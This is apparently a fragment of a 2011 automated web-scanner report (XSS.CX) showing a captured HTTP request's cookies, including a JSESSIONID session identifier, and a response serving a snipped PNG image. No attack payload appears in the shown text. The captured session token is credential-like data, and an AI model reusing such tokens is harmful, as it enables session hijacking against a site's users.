Cookie: v1st=F457A4E6990CD631; mbox=check#true#1308313859|session#1308313730257-773381#1308315659|disable#browser%20timeout#1308317346; __utmz=259108511.1308313866.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=259108511.91682261.1308313866.1308313866.1308313866.1; __utmc=259108511; __utmb=259108511.1.10.1308313866; JSESSIONID=00016ZyTVoyONQxxPi4taI__Gdv:13ffav57i:13ffb8sd7

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:31:55 GMT
Server: Apache
Last-Modified: Wed, 20 Oct 2010 04:58:50 GMT
Accept-Ranges: bytes
Content-Length: 907
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: image/gif

.PNG
.
...IHDR...6...........>.....PLTE......[ad......BHK...~....................tz}Y_bMSV...ekn.........................................................sx{OVXqwzjor......5<?)03.....................
...[SNIP]...

Report generated by XSS.CX at Fri Jun 17 07:49:40 CDT 2011.